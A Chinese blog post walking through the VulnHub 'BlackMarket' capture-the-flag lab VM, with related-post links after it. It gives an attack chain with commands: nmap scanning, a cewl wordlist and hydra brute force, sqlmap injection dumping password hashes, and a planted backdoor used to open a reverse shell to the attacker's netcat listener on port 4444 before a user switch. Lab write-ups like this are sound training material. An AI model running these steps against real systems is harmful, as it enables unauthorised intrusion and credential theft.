BlackMarket靶机

原创 已于 2024-08-07 20:50:13 修改 · 1.3k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记

于 2024-08-07 20:32:43 首次发布

靶机IP地址

扫描靶机开放的端口

nmap -p- -A 192.168.111.143

访问80端口拿到一个登陆界面。查看源码在最后面拿到第一个flag。Web登录页面没有验证码,ftp也可以访问,但是需要账号密码,这里保留对两处爆破的想法。

flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}

echo 'Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=' |base64 -d

base64解密得到的结果是CIA - Operation Treadstone,google了一下这好像是一部影片

从WP来看能搜索到一个介绍CIA - Operation Treadstone的网站https://bourne.fandom.com/wiki/Operation_Treadstone
利用cewl爬取网站生成关联词字典

cewl https://bourne.fandom.com/wiki/Operation_Treadstone -d 1 -w BlackMarket_dic.txt

拿生成的字典对账号密码利用hydra进行爆破

拿到ftp的账号密码登录。在ftp里面拿到第二个flag

ftp 192.168.111.143
ls -al
cd ftp
ls -al
cd IMPFiles
ls -al
get IMP.txt

查看上面的提示,我专注于“车辆车间”,并开始检查网络浏览器以查找具有车辆/车间的每个可能目录,不幸的是,我在尝试时检索了以下网页

http://192.168.111.143/vworkshop/

那是黑市汽车车间的仪表板。

在检查了整个仪表板之后,我们签出了备件并观察了其网页和 URL。因此,我们决定使用 SQLMAP against 进行 SQL 注入。

执行以下命令,在sqlmap的帮助下获取其数据库名称。

python3 sqlmap.py -u http://192.168.111.143/vworkshop/sparepartsstoremore.php?sparepartid=1 --dbs --batch

在这里,我找到了一些数据库名称,根据我的考虑,它应该是黑市,因此,为了不浪费时间,我提前从其中获取表。

拿到第三个flag

然后我们获取了表“user”并找到了带有其哈希密码的用户名。

用户名:admin |密码:cf18233438b9e88937ea0176f1311885 MD5:BigBossCIA

用户名: user |password: 0d8d5cd06832b29560745fe4e1b941cf md5 (md5($pass)) : user

再次在浏览器中探索目标 IP,并输入以下凭据进行登录。

获得第四个flag

从 Inside 客户那里,我收到了用户 Jason Bourne 的电子邮件 ID jbourne@cia.gov。

目录扫描

注意到 /squirrelmail/

因此,我们探索以下 URL http://192.168.1.104/squirrelmail/,并输入以下给定的凭据,如 第四个flag (Jason Bourne电子邮件访问?????)

用户名: jbourne

密码:?????

它给出了以下邮箱

在邮箱里面拿到flag5,意思是他拿到一段信息不会解密。

置换密码

寻找上述路径

字符串工具并输入以下命令从其内部提取元数据。

strings PassPass.jpg

由于上面提取的元数据“Pass”可能是可能的密码,我们可以将其用于进一步的方法,因此,我们尝试对其进行解码。由于它是十进制 (5215565757312090656) 格式,因此首先,我们将其解码为十六进制 (4861696C4B474220),然后将其解码为 ascii 并得到“HailKGB”

到达了以下 URL,您将在其中找到“未找到页面”错误消息.......

http://192.168.111.143/vworkshop/kgbbackdoor/backdoor.php

有一个隐藏的密码输入框看网页源码可以发现

输入攻击者 IP:192.168.111.147 和监听端口 4444,然后在新终端中启动 netcat 监听以获取受害者的反向连接

成功监听

发现第六个flag

cd /home ls -al cd .Mylife ls -al cat .Secret

DimitriHateApple,因为该文件被命名为秘密,因此,我将 DimitriHateApple 作为用户的密码:Dimitri

用户:Dimitri

密码: DimitriHateApple

python -c 'import pty; pty.spawn("/bin/bash")'
su dimitri
DimitriHateApple

显示为all,所有命令都可以

成功

陽陽yy
关注
BlackMarket靶机复现【附代码】(权限提升)
网安学习
08-09 3907
web打洞值得挑战!!!全网最详细的BLACKMARKET过程!【少绕弯路!!!】
小白渗透0-1:BlackMarket场渗透记录
qq_49399033的博客
07-01 1634
这是一次BlackMarket场渗透记录
BlackMarket靶机复现
weixin_52956666的博客
08-07 1462
因为squirrelmail是web邮箱应用,存在 CVE-2017-7692 远程代码执行漏洞,但是得有一个用户可以登陆进去。因为 内核版本是4.4.0-31-generic,可以进行脏牛 CVE-2016-5195 提权。并且发现一句话Jason Bourne Email access?抓包,去查看,发现存在id值,这里先尝试改为1,因为大部分高权限用户都是1。尝试squirrelmail,squirrelmail。进入后发现没东西,一点发现有个隐藏的输入框。
blackmarket靶机
weixin_73074638的博客
08-10 505
Google搜索 https://bourne.fandom.com/wiki/Operation_Treadstone。访问web服务80端口,发现flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}more IMP.txt发现flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}尝试弱口令---破解出账号密码supplier:supplier。输入得到的密码得到flag6{Um9vdCB0aW1l}名字为Jbourne,密码为?
vulnhub-BlackMarket 1靶机
wjSteve的博客
09-27 689
DimitryHateApple这个词很唐突,或许是个密码,尝试登录dimitri,首先获得交互式shell。在BlackMarket库下flag表找到第三个flag,然后提示要找到一个邮箱,爆破user表。到这一步我去看了一下WP,似乎这个Flag指向的是一个电影,通过Wiki的资料生成一个字典。登陆需要密码,怀疑flag4哪里的“access”是个同义词,也就是说密码就是?登陆界面,没有能登陆的信息,查看一下元素找到一个flag。既然有邮箱,那么应该就有邮箱登录的地方,扫一下网站目录。
Vulhub BlackMarket: 1靶机详解
weixin_62457642的博客
10-16 870
靶机BlackMarket: 1速刷
【渗透测试】Vulnhub靶机-HA: Armour-详细通关教程
xianbang_z的博客
04-06 844
开始前看到靶机简介,有5个装甲说明,可能是flag命名,另外最后声明有密码是分3份,可能要组合起来登录若出现靶机无法获取ip情况 →解决靶机ip问题本次虚拟机ip:kali主机:192.168.4.231vulnhub靶机:192.168.4.222这台靶机整体中等偏下,最后8081端口的flag需要进行代理来查看,同时这台靶机也要注重信息收集的关键,否则连69端口的tftp都没注意到,渗透链为:1.端口扫描后通过源码发现69端口提示notes.txt,进入tftp拿到spidenman的flag。
BlackMarket_ 1靶机渗透
weixin_67832625的博客
10-11 914
这段话告诉我们/kgbbackdoor目录下留了一个后门,后门是一张叫PassPass.jpg的图片。点击INBOX.Trash——>IMPORTANT MESSAGE,发现了第五个flag。编辑AK74U时抓包,再使用sqlmap检测是否存在SQL注入,发现存在SQL注入。发现该靶机开放了21,22,80,110,143,993,995端口。尝试使用目录名字supplier supplier登录,发现登录成功。使用账号密码jbourne?浏览器访问80端口,发现是一个登录页面。
BlackMarket
03-21
【标题】BlackMarket 在IT行业中,"BlackMarket"这个名字可能会让人联想到暗网上的非法交易市场,但在编程和开发领域,它可能是指一个特定的项目、框架或应用。由于提供的信息有限,我们只能根据“BlackMarket”这...
blackMarket-开源
04-14
而"blackMarket-开源"通过提供一个直观的Web界面,使得对proftpd的管理变得更加便捷,用户无需直接通过命令行进行操作,降低了管理难度,提高了工作效率。 接下来,我们关注MySQL。MySQL是一个关系型数据库管理系统...
Java SE——12.异常(≠错误)《干货笔记
要努力去发光,而不是被照亮~
12-08 1089
Java SE——12.异常(≠错误)《干货笔记
吴恩达新课程:Agentic AI(笔记12)
最新发布
cfy2401926342的博客
12-08 598
摘要:本文介绍了Agent系统中的规划设计模式,该模式使智能体能够自主决定执行复杂任务的工具调用序列,无需硬编码。以客服助理Agent为例,通过提供工具集和LLM编写结构化执行计划(如JSON格式),系统可灵活处理复杂查询。该模式扩展了任务范围,提高了灵活性,但也存在结果不稳定等风险。推荐使用Huggingface社区的smolagents框架,其简洁易用,适合开发者入门和定制化系统。结构化输出(如JSON)确保计划可靠解析和执行,提升系统稳定性。
2025-11-27-LeetCode刷题笔记-3381-长度可被K整除的子数组的最大元素和
tkhhhhh的博客
12-04 386
摘要: LeetCode 3381题要求找出长度能被k整除的子数组的最大和。解题关键在于结合前缀和与模运算技巧:通过计算前缀和数组,按位置模k分类,维护每类余数的最小前缀和。这样可以在O(n)时间内计算每个位置结尾的子数组最大和,只需一次遍历即可得到结果。算法空间复杂度为O(k)。提供了Python、Go和C++的实现代码,并讨论了负数处理等边界情况。核心思路是利用同余性质优化计算,避免暴力枚举。
LinuxC语言并发程序笔记补充
chenzhou__的博客
12-04 687
锁除了互斥锁,还有一个读写锁,进程通信还有对互斥锁优化的条件变量和死锁的概念。
《人工智能现代方法(第4版)》 第8章 一阶逻辑 学习笔记
data_disciple的博客
12-06 442
本章介绍了从命题逻辑升级到一阶逻辑的必要性和方法。命题逻辑只能描述具体事实,无法表达普遍规律,而一阶逻辑通过引入对象、关系、量词等要素,使智能体能够进行概括性思考。文章详细讲解了一阶逻辑的语法规则(常量、变量、谓词、函数、量词等)、语义解释(模型论)以及知识工程应用(如亲属关系推理)。一阶逻辑虽然强大,但仍存在表达"大多数"、概率和模糊概念等局限。作为AI知识表示的基础,一阶逻辑实现了从"点状思维"到"关系型思维"的转变,但现实世界的不确定性仍需非
Kubernetes(核心概念+使用方法),入门笔记-by B站:GeekHour
2303_77756141的博客
12-04 809
Kubernetes(K8s)是一个开源的容器编排平台,用于自动化部署、扩展和管理容器化应用。其核心组件包括Pod(最小调度单元)、Service(服务抽象)、Ingress(外部访问管理)、ConfigMap/Secret(配置管理)、Volume(持久化存储)等。K8s采用Master-Worker架构,Master节点负责管理,Worker节点运行应用。本地开发可使用minikube搭建简化版集群,生产环境则需多节点保证高可用。常用命令包括kubectl创建Pod、Deployment等资源对象。K8
SpaceClaim流体域创建学习笔记
m0_56086190的博客
12-03 1029
核心思想: 把流体域看作一个普通的几何实体,用SpaceClaim的建模工具直接创建。适用场景外流场分析(汽车、飞机、建筑物)简单规则的内流场核心思想: 当固体模型是一个封闭的容器时,其内部的"空腔"就是流体域。我们需要将这个空腔"实体化"。物理类比想象一个水壶:实体模型 = 壶壁+壶身+壶嘴(外形)流体域 = 如果你能冻住水壶里的水,它的形状抽取过程 = 用"魔法"把壶里的水变成实体适用场景管道系统泵、阀门内部流动热交换器任何"流体在容器内"的情况。
零基础小白自学 Git_Github 教程,Git 命令行操作3,笔记20
Rockandrollman的博客
12-03 215
零基础小白自学 Git_Github 教程,Git 命令行操作3,笔记20
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值